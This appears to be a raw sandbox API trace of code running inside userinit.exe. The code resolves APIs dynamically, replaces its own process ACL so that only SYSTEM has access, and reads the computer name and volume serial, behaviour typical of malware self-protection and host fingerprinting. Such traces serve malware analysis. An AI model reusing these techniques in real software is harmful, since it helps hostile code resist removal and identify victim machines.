[0179.961] IsValidSid (pSid=0x2a7f90c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x13)) returned 1
[0179.961] ConvertSidToStringSidA () returned 0x1
[0179.961] LocalFree (hMem=0x926f58) returned 0x0
[0179.961] LocalFree (hMem=0x926f40) returned 0x0
[0179.961] ConvertStringSidToSidA () returned 0x1
[0179.961] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a7f998, pSourceSid=0x926f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xa) | out: pDestinationSid=0x2a7f998*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xa)) returned 1
[0179.961] IsValidSid (pSid=0x2a7f998*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xa)) returned 1
[0179.961] ConvertSidToStringSidA () returned 0x1
[0179.961] LocalFree (hMem=0x926f58) returned 0x0
[0179.961] LocalFree (hMem=0x926f40) returned 0x0
[0179.961] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0179.961] GetProcAddress (hModule=0x75370000, lpProcName="GetCurrentThread") returned 0x753c3351
[0179.961] GetCurrentThread () returned 0xfffffffe
[0179.961] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0179.961] GetProcAddress (hModule=0x76da0000, lpProcName="OpenThreadToken") returned 0x76db432c
[0179.961] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0xf01ff, OpenAsSelf=1, TokenHandle=0x20e9dc | out: TokenHandle=0x20e9dc*=0x2953756) returned 0
[0179.962] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0179.962] GetProcAddress (hModule=0x75370000, lpProcName="GetCurrentProcess") returned 0x753bcdcf
[0179.962] GetCurrentProcess () returned 0xffffffff
[0179.962] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0179.962] GetProcAddress (hModule=0x76da0000, lpProcName="OpenProcessToken") returned 0x76db4304
[0179.962] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0xf01ff, TokenHandle=0x2a7fa3c | out: TokenHandle=0x2a7fa3c*=0x1d0) returned 1
[0179.962] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0179.962] GetProcAddress (hModule=0x76da0000, lpProcName="MapGenericMask") returned 0x76dc7a73
[0179.962] MapGenericMask (in: AccessMask=0x20e854, GenericMapping=0x20e858 | out: AccessMask=0x20e854)
[0179.962] MapGenericMask (in: AccessMask=0x20e988, GenericMapping=0x20e98c | out: AccessMask=0x20e988)
[0179.962] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0179.962] GetProcAddress (hModule=0x76da0000, lpProcName="GetTokenInformation") returned 0x76db431c
[0179.963] GetTokenInformation (in: TokenHandle=0x1d0, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20e99c | out: TokenInformation=0x0, ReturnLength=0x20e99c) returned 0
[0179.963] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0179.963] GetProcAddress (hModule=0x75370000, lpProcName="GetLastError") returned 0x753bbf00
[0179.963] GetLastError () returned 0x7a
[0179.963] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0179.963] GetProcAddress (hModule=0x75370000, lpProcName="HeapAlloc") returned 0x76f72dd6
[0179.963] GetTokenInformation (in: TokenHandle=0x1d0, TokenInformationClass=0x1, TokenInformation=0x920780, TokenInformationLength=0x24, ReturnLength=0x20e9c0 | out: TokenInformation=0x920780, ReturnLength=0x20e9c0) returned 1
[0179.963] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a7fab0, pSourceSid=0x920788*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65)) | out: pDestinationSid=0x2a7fab0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65))) returned 1
[0179.963] IsValidSid (pSid=0x2a7fab0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65))) returned 1
[0179.963] ConvertSidToStringSidA () returned 0x1
[0179.963] LocalFree (hMem=0x919e80) returned 0x0
[0179.963] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0179.963] GetProcAddress (hModule=0x75370000, lpProcName="HeapFree") returned 0x753bbbd0
[0179.963] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a7fb34, pSourceSid=0x2a7fab0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65)) | out: pDestinationSid=0x2a7fb34*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65))) returned 1
[0179.963] IsValidSid (pSid=0x2a7fb34*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65))) returned 1
[0179.963] ConvertSidToStringSidA () returned 0x1
[0179.963] LocalFree (hMem=0x919e80) returned 0x0
[0179.964] IsValidSid (pSid=0x2a7fb34*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65))) returned 1
[0179.964] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0179.964] GetProcAddress (hModule=0x75370000, lpProcName="CloseHandle") returned 0x753bca7c
[0179.964] CloseHandle (hObject=0x1d0) returned 1
[0179.964] ConvertStringSidToSidA () returned 0x1
[0179.964] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a7fa54, pSourceSid=0x926f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x1000) | out: pDestinationSid=0x2a7fa54*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x1000)) returned 1
[0179.964] IsValidSid (pSid=0x2a7fa54*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x1000)) returned 1
[0179.964] ConvertSidToStringSidA () returned 0x1
[0179.964] LocalFree (hMem=0x926f58) returned 0x0
[0179.964] LocalFree (hMem=0x926f40) returned 0x0
[0179.964] ConvertStringSidToSidA () returned 0x1
[0179.964] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a7fae0, pSourceSid=0x926f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000) | out: pDestinationSid=0x2a7fae0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 1
[0179.964] IsValidSid (pSid=0x2a7fae0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 1
[0179.964] ConvertSidToStringSidA () returned 0x1
[0179.964] LocalFree (hMem=0x926f58) returned 0x0
[0179.964] LocalFree (hMem=0x926f40) returned 0x0
[0179.964] ConvertStringSidToSidA () returned 0x1
[0179.964] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a7fbfc, pSourceSid=0x926f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000) | out: pDestinationSid=0x2a7fbfc*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000)) returned 1
[0179.964] IsValidSid (pSid=0x2a7fbfc*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000)) returned 1
[0179.964] ConvertSidToStringSidA () returned 0x1
[0179.964] LocalFree (hMem=0x926f58) returned 0x0
[0179.964] LocalFree (hMem=0x926f40) returned 0x0
[0179.964] ConvertStringSidToSidA () returned 0x1
[0179.964] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a7fc8c, pSourceSid=0x926f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x4000) | out: pDestinationSid=0x2a7fc8c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x4000)) returned 1
[0179.964] IsValidSid (pSid=0x2a7fc8c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x4000)) returned 1
[0179.964] ConvertSidToStringSidA () returned 0x1
[0179.964] LocalFree (hMem=0x926f58) returned 0x0
[0179.964] LocalFree (hMem=0x926f40) returned 0x0
[0179.965] ConvertStringSidToSidA () returned 0x1
[0179.965] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a7fd1c, pSourceSid=0x926f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x5000) | out: pDestinationSid=0x2a7fd1c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x5000)) returned 1
[0179.965] IsValidSid (pSid=0x2a7fd1c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x5000)) returned 1
[0179.965] ConvertSidToStringSidA () returned 0x1
[0179.965] LocalFree (hMem=0x926f58) returned 0x0
[0179.965] LocalFree (hMem=0x926f40) returned 0x0
[0179.965] GetCurrentProcessId () returned 0x5cc
[0179.965] OpenProcess (dwDesiredAccess=0x60000, bInheritHandle=0, dwProcessId=0x5cc) returned 0x1d0
[0179.965] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0179.965] GetProcAddress (hModule=0x76da0000, lpProcName="GetSecurityInfo") returned 0x76dab3e4
[0179.965] GetSecurityInfo () returned 0x0
[0179.968] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0179.968] GetProcAddress (hModule=0x76da0000, lpProcName="GetSecurityDescriptorControl") returned 0x76daaddf
[0179.968] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x920f28, pControl=0x20e762, lpdwRevision=0x20e75c | out: pControl=0x20e762, lpdwRevision=0x20e75c) returned 1
[0179.968] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0179.968] GetProcAddress (hModule=0x76da0000, lpProcName="GetSecurityDescriptorOwner") returned 0x76daadf7
[0179.968] GetSecurityDescriptorOwner (in: pSecurityDescriptor=0x920f28, pOwner=0x20e758, lpbOwnerDefaulted=0x20e74c | out: pOwner=0x20e758*=0x0, lpbOwnerDefaulted=0x20e74c) returned 1
[0179.968] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0179.968] GetProcAddress (hModule=0x76da0000, lpProcName="GetSecurityDescriptorGroup") returned 0x76daae27
[0179.968] GetSecurityDescriptorGroup (in: pSecurityDescriptor=0x920f28, pGroup=0x20e758, lpbGroupDefaulted=0x20e74c | out: pGroup=0x20e758*=0x0, lpbGroupDefaulted=0x20e74c) returned 1
[0179.968] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0179.968] GetProcAddress (hModule=0x76da0000, lpProcName="GetSecurityDescriptorDacl") returned 0x76db41a6
[0179.968] GetSecurityDescriptorDacl (in: pSecurityDescriptor=0x920f28, lpbDaclPresent=0x20e750, pDacl=0x20e744, lpbDaclDefaulted=0x20e74c | out: lpbDaclPresent=0x20e750, pDacl=0x20e744, lpbDaclDefaulted=0x20e74c) returned 1
[0179.969] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0179.969] GetProcAddress (hModule=0x76da0000, lpProcName="IsValidAcl") returned 0x76da8523
[0179.969] IsValidAcl (pAcl=0x920f3c) returned 1
[0179.969] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0179.969] GetProcAddress (hModule=0x76da0000, lpProcName="GetAce") returned 0x76db45f0
[0179.969] GetAce (in: pAcl=0x920f3c, dwAceIndex=0x0, pAce=0x20e5e4 | out: pAce=0x20e5e4*=0x920f44) returned 1
[0179.969] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a7fe74, pSourceSid=0x920f4c*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)) | out: pDestinationSid=0x2a7fe74*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0179.969] IsValidSid (pSid=0x2a7fe74*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0179.969] ConvertSidToStringSidA () returned 0x1
[0179.969] LocalFree (hMem=0x927018) returned 0x0
[0179.969] GetAce (in: pAcl=0x920f3c, dwAceIndex=0x1, pAce=0x20e5e4 | out: pAce=0x20e5e4*=0x920f5c) returned 1
[0179.969] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a7ff60, pSourceSid=0x920f64*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12) | out: pDestinationSid=0x2a7ff60*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0179.969] IsValidSid (pSid=0x2a7ff60*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0179.969] ConvertSidToStringSidA () returned 0x1
[0179.969] LocalFree (hMem=0x927018) returned 0x0
[0179.969] GetAce (in: pAcl=0x920f3c, dwAceIndex=0x2, pAce=0x20e5e4 | out: pAce=0x20e5e4*=0x920f70) returned 1
[0179.969] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a729c0, pSourceSid=0x920f78*(Revision=0x1, SubAuthorityCount=0x3, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x5, [1]=0x0, [2]=0x0)) | out: pDestinationSid=0x2a729c0*(Revision=0x1, SubAuthorityCount=0x3, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x5, [1]=0x0, [2]=0x0))) returned 1
[0179.969] IsValidSid (pSid=0x2a729c0*(Revision=0x1, SubAuthorityCount=0x3, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x5, [1]=0x0, [2]=0x0))) returned 1
[0179.969] ConvertSidToStringSidA () returned 0x1
[0179.969] LocalFree (hMem=0x927018) returned 0x0
[0179.970] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0179.970] GetProcAddress (hModule=0x76da0000, lpProcName="GetSecurityDescriptorSacl") returned 0x76db4608
[0179.970] GetSecurityDescriptorSacl (in: pSecurityDescriptor=0x920f28, lpbSaclPresent=0x20e754, pSacl=0x20e748, lpbSaclDefaulted=0x20e74c | out: lpbSaclPresent=0x20e754, pSacl=0x20e748, lpbSaclDefaulted=0x20e74c) returned 1
[0179.970] LocalFree (hMem=0x920f28) returned 0x0
[0179.970] IsValidSid (pSid=0x2a7f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0179.970] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0179.970] GetProcAddress (hModule=0x76da0000, lpProcName="GetLengthSid") returned 0x76db413b
[0179.970] GetLengthSid (pSid=0x2a7f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0xc
[0179.970] GetLastError () returned 0x0
[0179.970] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0179.970] GetProcAddress (hModule=0x75370000, lpProcName="GlobalAlloc") returned 0x753b9ce1
[0179.971] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0179.971] GetProcAddress (hModule=0x76da0000, lpProcName="InitializeAcl") returned 0x76db45cd
[0179.971] InitializeAcl (in: pAcl=0x927fa8, nAclLength=0x1c, dwAclRevision=0x2 | out: pAcl=0x927fa8) returned 1
[0179.971] IsValidSid (pSid=0x2a7f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0179.971] GetLengthSid (pSid=0x2a7f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0xc
[0179.971] GetLastError () returned 0x0
[0179.971] IsValidSid (pSid=0x2a7f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0179.971] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0179.971] GetProcAddress (hModule=0x75370000, lpProcName="SetLastError") returned 0x753bbb08
[0179.971] SetLastError (dwErrCode=0x0)
[0179.971] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0179.971] GetProcAddress (hModule=0x76da0000, lpProcName="GetSidSubAuthorityCount") returned 0x76db0e0c
[0179.971] GetSidSubAuthorityCount (pSid=0x2a7f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0x2a7f615
[0179.971] GetLastError () returned 0x0
[0179.971] IsValidSid (pSid=0x2a7f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0179.971] SetLastError (dwErrCode=0x0)
[0179.971] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0179.972] GetProcAddress (hModule=0x76da0000, lpProcName="GetSidIdentifierAuthority") returned 0x76daa935
[0179.972] GetSidIdentifierAuthority (pSid=0x2a7f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0x2a7f616
[0179.972] GetLastError () returned 0x0
[0179.972] IsValidSid (pSid=0x2a7f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0179.972] IsValidSid (pSid=0x2a7f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0179.972] SetLastError (dwErrCode=0x0)
[0179.972] GetSidSubAuthorityCount (pSid=0x2a7f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0x2a7f615
[0179.972] GetLastError () returned 0x0
[0179.972] SetLastError (dwErrCode=0x0)
[0179.972] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0179.972] GetProcAddress (hModule=0x76da0000, lpProcName="GetSidSubAuthority") returned 0x76db0e24
[0179.972] GetSidSubAuthority (pSid=0x2a7f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12), nSubAuthority=0x0) returned 0x2a7f61c
[0179.972] GetLastError () returned 0x0
[0179.972] IsValidSid (pSid=0x2a7f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0179.972] GetLengthSid (pSid=0x2a7f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0xc
[0179.972] GetLastError () returned 0x0
[0179.972] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0179.972] GetProcAddress (hModule=0x76da0000, lpProcName="AddAce") returned 0x76daae0f
[0179.972] AddAce (in: pAcl=0x927fa8, dwAceRevision=0x2, dwStartingAceIndex=0xffffffff, pAceList=0x912f90, nAceListLength=0x14 | out: pAcl=0x927fa8) returned 1
[0179.973] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0179.973] GetProcAddress (hModule=0x75370000, lpProcName="GlobalFree") returned 0x753b9cf9
[0179.973] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0179.973] GetProcAddress (hModule=0x76da0000, lpProcName="SetSecurityInfo") returned 0x76da9edf
[0179.973] SetSecurityInfo () returned 0x0
[0179.973] CloseHandle (hObject=0x1d0) returned 1
[0179.973] GetComputerNameA (in: lpBuffer=0x2a7fd84, nSize=0x20ea1c | out: lpBuffer="CRH2YWU7", nSize=0x20ea1c) returned 1
[0179.973] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x20e908, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0179.974] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x20ea04, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x20ea18, lpMaximumComponentLength=0x20ea14, lpFileSystemFlags=0x20ea10, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x20ea18*=0x90c08a66, lpMaximumComponentLength=0x20ea14*=0xff, lpFileSystemFlags=0x20ea10*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0179.974] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x20e910, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0179.974] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x20ea04, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x20ea18, lpMaximumComponentLength=0x20ea14, lpFileSystemFlags=0x20ea10, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x20ea18*=0x90c08a66, lpMaximumComponentLength=0x20ea14*=0xff, lpFileSystemFlags=0x20ea10*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0179.974] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x20e910, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0179.974] VirtualAlloc (lpAddress=0x2a80000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x2a80000
[0179.975] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x20ea04, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x20ea18, lpMaximumComponentLength=0x20ea14, lpFileSystemFlags=0x20ea10, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x20ea18*=0x90c08a66, lpMaximumComponentLength=0x20ea14*=0xff, lpFileSystemFlags=0x20ea10*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0179.975] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x20e908, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0179.975] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x20ea04, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x20ea18, lpMaximumComponentLength=0x20ea14, lpFileSystemFlags=0x20ea10, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x20ea18*=0x90c08a66, lpMaximumComponentLength=0x20ea14*=0xff, lpFileSystemFlags=0x20ea10*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0179.975] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x20e908, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0179.975] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x20ea04, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x20ea18, lpMaximumComponentLength=0x20ea14, lpFileSystemFlags=0x20ea10, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x20ea18*=0x90c08a66, lpMaximumComponentLength=0x20ea14*=0xff, lpFileSystemFlags=0x20ea10*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0179.975] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x20e908, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
